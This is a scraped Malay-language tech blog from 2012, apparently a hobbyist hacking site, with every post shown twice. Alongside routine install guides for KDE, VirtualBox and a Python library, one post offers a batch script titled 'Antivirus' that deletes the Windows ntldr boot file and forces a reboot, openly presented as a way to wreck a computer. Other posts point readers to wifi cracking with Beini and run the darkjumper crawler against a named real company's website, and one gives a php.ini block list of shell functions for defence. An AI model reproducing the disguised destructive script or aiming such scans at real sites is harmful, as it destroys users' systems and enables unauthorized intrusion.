korang google sendiri .

Korang Boleh download ikut kesesuian laptop korang ,,

64-bit Python 3.2: chilkat-9.3.1-python-3.2-x86_64-linux.tar.gz

32-bit Python 3.2: chilkat-9.3.1-python-3.2-i686-linux.tar.gz

64-bit Python 3.1: chilkat-9.3.1-python-3.1-x86_64-linux.tar.gz

32-bit Python 3.1: chilkat-9.3.1-python-3.1-i686-linux.tar.gz

64-bit Python 3.0: chilkat-9.3.1-python-3.0-x86_64-linux.tar.gz

32-bit Python 3.0: chilkat-9.3.1-python-3.0-i686-linux.tar.gz

64-bit Python 2.7: chilkat-9.3.1-python-2.7-x86_64-linux.tar.gz

32-bit Python 2.7: chilkat-9.3.1-python-2.7-i686-linux.tar.gz

64-bit Python 2.6: chilkat-9.3.1-python-2.6-x86_64-linux.tar.gz

32-bit Python 2.6: chilkat-9.3.1-python-2.6-i686-linux.tar.gz

32-bit Python 2.5: chilkat-9.3.1-python-2.5-i686-linux.tar.gz



Selepass Itu korang login as Root .

root@Erry:~$ su


root@Erry:~$ cd /


root@Erry:~$ gzip -dc chilkat-9.3.1-python-3.1-linux-x86_64.tar.gz | tar -xof -

Done .. kalau korang nak tengok .. taip ni

root@Erry:~$ Sudo -i


root@Erry:~$ cd /usr/local/lib/python3.2/site-packages/


root@Erry:~$ ls


Itu sahaja. Enjoy ..






Salam sejahtera

Hari ni seth nak kongsi satu benda yang menarik .
http://webdesignledger.com/wp-content/uploads/2010/04/script_fonts_11.jpg
Cara install chilkat di dalam Linux . apa itu chilkat ?

korang google sendiri .

Korang Boleh download ikut kesesuian laptop korang ,,

64-bit Python 3.2: chilkat-9.3.1-python-3.2-x86_64-linux.tar.gz

32-bit Python 3.2: chilkat-9.3.1-python-3.2-i686-linux.tar.gz

64-bit Python 3.1: chilkat-9.3.1-python-3.1-x86_64-linux.tar.gz

32-bit Python 3.1: chilkat-9.3.1-python-3.1-i686-linux.tar.gz

64-bit Python 3.0: chilkat-9.3.1-python-3.0-x86_64-linux.tar.gz

32-bit Python 3.0: chilkat-9.3.1-python-3.0-i686-linux.tar.gz

64-bit Python 2.7: chilkat-9.3.1-python-2.7-x86_64-linux.tar.gz

32-bit Python 2.7: chilkat-9.3.1-python-2.7-i686-linux.tar.gz

64-bit Python 2.6: chilkat-9.3.1-python-2.6-x86_64-linux.tar.gz

32-bit Python 2.6: chilkat-9.3.1-python-2.6-i686-linux.tar.gz

32-bit Python 2.5: chilkat-9.3.1-python-2.5-i686-linux.tar.gz



Selepass Itu korang login as Root .

root@Erry:~$ su


root@Erry:~$ cd /


root@Erry:~$ gzip -dc chilkat-9.3.1-python-3.1-linux-x86_64.tar.gz | tar -xof -

Done .. kalau korang nak tengok .. taip ni

root@Erry:~$ Sudo -i


root@Erry:~$ cd /usr/local/lib/python3.2/site-packages/


root@Erry:~$ ls


Itu sahaja. Enjoy ..






Saturday, July 14, 2012

Hancurkan Windows xp dan 7

Salam sejahtera semua

hari ni saya nak ajar korang cara nak hancurkan windows dengan satu file bat.

ini script nya . save as bat .

http://www.karbosguide.com/books/winxpsuperuser/images/671.png

@echo off

title Antivirus

echo Tengah buang virus ni

cd C:\

attrib ntldr -s -h -r

del ntldr

eh.. eh

echo JK yes. selamat tinggal denagn laptop anda

shutdown -r -t 10 -c Bye bye.



Itu sahaja .. Enjoy ..
Salam sejahtera semua

hari ni saya nak ajar korang cara nak hancurkan windows dengan satu file bat.

ini script nya . save as bat .

http://www.karbosguide.com/books/winxpsuperuser/images/671.png

@echo off

title Antivirus

echo Tengah buang virus ni

cd C:\

attrib ntldr -s -h -r

del ntldr

eh.. eh

echo JK yes. selamat tinggal denagn laptop anda

shutdown -r -t 10 -c Bye bye.



Itu sahaja .. Enjoy ..

Compress 1GB File to 10MB dengan KGB Archiver

Salam sejahtera .

Hari ini saya nak kongsi dengan korang semua satu software untk compress file dari 1gb menjadi 10Mb .

Korang jangan terlalu gembira kerana software ini tidak dapat compress file Video


Korang boleh download sini

Kelebihan :

  • Supports native .kgb files and .zip files
  • AES-256 Encryption
  • Able to create self-extracting archives.
  • Multilanguage supports like Arabic, German, Greek, Japanese, Spanish many more.
  • Unicode is supported in both User Interface and File Systems.
  • An Explorer shell extension is available for the windows version.
  • Make Password protected compressed file.

Salam sejahtera .

Hari ini saya nak kongsi dengan korang semua satu software untk compress file dari 1gb menjadi 10Mb .

Korang jangan terlalu gembira kerana software ini tidak dapat compress file Video


Korang boleh download sini

Kelebihan :

  • Supports native .kgb files and .zip files
  • AES-256 Encryption
  • Able to create self-extracting archives.
  • Multilanguage supports like Arabic, German, Greek, Japanese, Spanish many more.
  • Unicode is supported in both User Interface and File Systems.
  • An Explorer shell extension is available for the windows version.
  • Make Password protected compressed file.

Friday, July 13, 2012

Cara Run Beini mengunakan Virtual Box


Salam Sejahtera

Hari ini seth nak ajar korang cara menjalankan Beini di dalam Virtual Box .
bagaimana ?

Jom kita mulakan .

Pertama korang kena Download Beini dulu . Format .Iso [Images]

Ok . pertama sekali korang kena ada virtual Box .

Selepas itu korang Tekan "New" dan masukan VM name dan Os


Name:Beini
Operating System:Linux
Version:Other Linux

selepas itu korang klik next .

Korang hanya perlu klik next sehingga perkataan "Create" dan selesai .

Selepas itu korang akan jumpa macam gambar dibawah .


Korang klik terus kepada "Start" . maka akan keluar seperti gambar dibawah :

Korang kena pilih image iso korang sendiri .

Selepas itu korang klik "Next" dan Dia akan Run secara sendiri .

Tunggu dan Enjoy .

sama seperti setting untuk bactrack .

Jika korang nak hack wifi . korang klik pada "Feeding Bottle"

FeedingBottle juga ada di dalam Ubuntu .

t

Salam Sejahtera

Hari ini seth nak ajar korang cara menjalankan Beini di dalam Virtual Box .
bagaimana ?

Jom kita mulakan .

Pertama korang kena Download Beini dulu . Format .Iso [Images]

Ok . pertama sekali korang kena ada virtual Box .

Selepas itu korang Tekan "New" dan masukan VM name dan Os


Name:Beini
Operating System:Linux
Version:Other Linux

selepas itu korang klik next .

Korang hanya perlu klik next sehingga perkataan "Create" dan selesai .

Selepas itu korang akan jumpa macam gambar dibawah .


Korang klik terus kepada "Start" . maka akan keluar seperti gambar dibawah :

Korang kena pilih image iso korang sendiri .

Selepas itu korang klik "Next" dan Dia akan Run secara sendiri .

Tunggu dan Enjoy .

sama seperti setting untuk bactrack .

Jika korang nak hack wifi . korang klik pada "Feeding Bottle"

FeedingBottle juga ada di dalam Ubuntu .

t

Cara Install KDE Desktop dekat Ubuntu 12.04

Salam sejahtera

Hari ni seth nak ajar korang cara install KDE di dalam ubuntu 12.04 .

kde-desktop-snapshot


Kde merupakan theme di dalam ubuntu dan untuk mencantikan desktop ubuntu korang .

Bagaimana nak install ?

Buka terminal korang dengan cara:

Ctrl+Alt+T

masukan command tersebut

root@Erry:~$ sudo apt-get install kde-standard

root@Erry:~$sudo apt-get install kde-full

root@Erry:~$sudo reboot


Enjoy













Salam sejahtera

Hari ni seth nak ajar korang cara install KDE di dalam ubuntu 12.04 .

kde-desktop-snapshot


Kde merupakan theme di dalam ubuntu dan untuk mencantikan desktop ubuntu korang .

Bagaimana nak install ?

Buka terminal korang dengan cara:

Ctrl+Alt+T

masukan command tersebut

root@Erry:~$ sudo apt-get install kde-standard

root@Erry:~$sudo apt-get install kde-full

root@Erry:~$sudo reboot


Enjoy













Cara Install VirtualBox 4.1.14 in Ubuntu 12.04 (Precise Pangolin)

Salam sejahtera semua .

Hari ini seth nak ajar cara install virtual Box di dalam Ubuntu 12.04

virtualbox_precise_3


Pertama sekali korang buka Terminal

Ctrl+Alt+T

Ctrl+Alt+F2

pertama korag kena Download dan install Oracle’s public key

root@Erry:~$ wget -q http://download.virtualbox.org/virtualbox/debian/oracle_vbox.asc -O- | sudo apt-key add -

Selepas itu korang buat repo file untuk Virtualbox

root@Erry:~$ sudo -s echo "deb http://download.virtualbox.org/virtualbox/debian precise contrib" >> ~/virtualbox.list

root@Erry:~$ sudo mv ~/virtualbox.list /etc/apt/sources.list.d/

Selepas itu tiba masa untuk kita install virtual box

root@Erry:~$ sudo apt-get update

root@Erry:~$ sudo apt-get install dkms

root@Erry:~$ sudo apt-get install virtualbox-4.1

Enjoy .

Korang boleh buka dari Dash Home dan taip "Virtual"

Done
Salam sejahtera semua .

Hari ini seth nak ajar cara install virtual Box di dalam Ubuntu 12.04

virtualbox_precise_3


Pertama sekali korang buka Terminal

Ctrl+Alt+T

Ctrl+Alt+F2

pertama korag kena Download dan install Oracle’s public key

root@Erry:~$ wget -q http://download.virtualbox.org/virtualbox/debian/oracle_vbox.asc -O- | sudo apt-key add -

Selepas itu korang buat repo file untuk Virtualbox

root@Erry:~$ sudo -s echo "deb http://download.virtualbox.org/virtualbox/debian precise contrib" >> ~/virtualbox.list

root@Erry:~$ sudo mv ~/virtualbox.list /etc/apt/sources.list.d/

Selepas itu tiba masa untuk kita install virtual box

root@Erry:~$ sudo apt-get update

root@Erry:~$ sudo apt-get install dkms

root@Erry:~$ sudo apt-get install virtualbox-4.1

Enjoy .

Korang boleh buka dari Dash Home dan taip "Virtual"

Done

Wednesday, July 11, 2012

Hacking : Cara elakan Website dari backdoor

Salam sejahtera

hari ni saya nak ajar korang cara nak elakan website korang dari kena php shell . apa itu php shell ? php shell adalah satu script di mana script tersebut dapat mengekses semua maklumat yang ada dan menukar semua fail fail yang ada di dalam website anda .

http://2.bp.blogspot.com/-C-xbn41aCLA/TnSbHmH6dEI/AAAAAAAAAFg/sWKJoBVqag4/s1600/qw.png

Cara untuk mengelakan dari berlaku perkara tersebut korang boleh mengunakan php.ini script ..
Upload di dalam website korang .

1:Buka notepad
copy script di bawah ini

disable_functions = php_uname, getmyuid, getmypid, passthru, leak, listen, diskfreespace, tmpfile, link, ignore_user_abord, shell_exec, dl, set_time_limit, exec, system, highlight_file, source, show_source, fpaththru, virtual, posix_ctermid, posix_getcwd, posix_getegid, posix_geteuid, posix_getgid, posix_getgrgid, posix_getgrnam, posix_getgroups, posix_getlogin, posix_getpgid, posix_getpgrp, posix_getpid, posix, _getppid, posix_getpwnam, posix_getpwuid, posix_getrlimit, posix_getsid, posix_getuid, posix_isatty, posix_kill, posix_mkfifo, posix_setegid, posix_seteuid, posix_setgid, posix_setpgid, posix_setsid, posix_setuid, posix_times, posix_ttyname, posix_uname, proc_open, proc_close, proc_get_status, proc_nice, proc_terminate, phpinfo,system,passthru,shell_exec,escapeshellarg,escapeshellcmd,proc_close,proc_open,ini_alter,dl,popen,

popen,pcntl_exec,socket_accept,socket_bind,socket_clear_error,socket_close,socket_connectsafe_mode = Onregister_globals = Offdisplay_errors = Offallow_url_fopen = Offallow_url_include = Offenable open_basedir(set it to webroot path)

2: save as Php.Ini dan upload di dalam website korang ,


Itu sahaja .

Salam sejahtera

hari ni saya nak ajar korang cara nak elakan website korang dari kena php shell . apa itu php shell ? php shell adalah satu script di mana script tersebut dapat mengekses semua maklumat yang ada dan menukar semua fail fail yang ada di dalam website anda .

http://2.bp.blogspot.com/-C-xbn41aCLA/TnSbHmH6dEI/AAAAAAAAAFg/sWKJoBVqag4/s1600/qw.png

Cara untuk mengelakan dari berlaku perkara tersebut korang boleh mengunakan php.ini script ..
Upload di dalam website korang .

1:Buka notepad
copy script di bawah ini

disable_functions = php_uname, getmyuid, getmypid, passthru, leak, listen, diskfreespace, tmpfile, link, ignore_user_abord, shell_exec, dl, set_time_limit, exec, system, highlight_file, source, show_source, fpaththru, virtual, posix_ctermid, posix_getcwd, posix_getegid, posix_geteuid, posix_getgid, posix_getgrgid, posix_getgrnam, posix_getgroups, posix_getlogin, posix_getpgid, posix_getpgrp, posix_getpid, posix, _getppid, posix_getpwnam, posix_getpwuid, posix_getrlimit, posix_getsid, posix_getuid, posix_isatty, posix_kill, posix_mkfifo, posix_setegid, posix_seteuid, posix_setgid, posix_setpgid, posix_setsid, posix_setuid, posix_times, posix_ttyname, posix_uname, proc_open, proc_close, proc_get_status, proc_nice, proc_terminate, phpinfo,system,passthru,shell_exec,escapeshellarg,escapeshellcmd,proc_close,proc_open,ini_alter,dl,popen,

popen,pcntl_exec,socket_accept,socket_bind,socket_clear_error,socket_close,socket_connectsafe_mode = Onregister_globals = Offdisplay_errors = Offallow_url_fopen = Offallow_url_include = Offenable open_basedir(set it to webroot path)

2: save as Php.Ini dan upload di dalam website korang ,


Itu sahaja .

Friday, July 6, 2012

Cara install darkjumper dalam linux

salam sejahtera .

hari ni seth nak ajar korang cara install darkjumper di dalam linuxhttp://3.bp.blogspot.com/-neW5zvecJXU/TbBw3wqd5bI/AAAAAAAAAW8/hBumvPuIAzU/s1600/Screenshot-1.jpg

darkjumper untuk crawl website .

first korang kena install python:

Seth @Seth-Erry ~$ sudo apt-get install python

masuk dlm ni dulu /data/src

Seth @Seth-Erry ~$ cd /data/src/

lepas tu korang download

Seth @Seth-Erry ~$ wget http://ignum.dl.sourceforge.net/project/darkjumper/darkjumper.v5.7.tar.gz

unpack darkjumper

Seth @Seth-Erry ~$ tar xzvf darkjumper.v5.7.tar.gz

lepas tu korang akan junpa. basic command

Seth @Seth-Erry ~$ ./darkjumper.py -t -m

ni contoh meh ...

Seth @Seth-Erry ~$ ./darkjumper.py -t www.celcom.com.my -m full

salam sejahtera .

hari ni seth nak ajar korang cara install darkjumper di dalam linuxhttp://3.bp.blogspot.com/-neW5zvecJXU/TbBw3wqd5bI/AAAAAAAAAW8/hBumvPuIAzU/s1600/Screenshot-1.jpg

darkjumper untuk crawl website .

first korang kena install python:

Seth @Seth-Erry ~$ sudo apt-get install python

masuk dlm ni dulu /data/src

Seth @Seth-Erry ~$ cd /data/src/

lepas tu korang download

Seth @Seth-Erry ~$ wget http://ignum.dl.sourceforge.net/project/darkjumper/darkjumper.v5.7.tar.gz

unpack darkjumper

Seth @Seth-Erry ~$ tar xzvf darkjumper.v5.7.tar.gz

lepas tu korang akan junpa. basic command

Seth @Seth-Erry ~$ ./darkjumper.py -t -m

ni contoh meh ...

Seth @Seth-Erry ~$ ./darkjumper.py -t www.celcom.com.my -m full

 

About

Site Info

Related Posts Plugin for WordPress, Blogger...

tutors Copyright © 2009 Community is Designed by Bie Converted To Community Galleria by Cool Tricks N Tips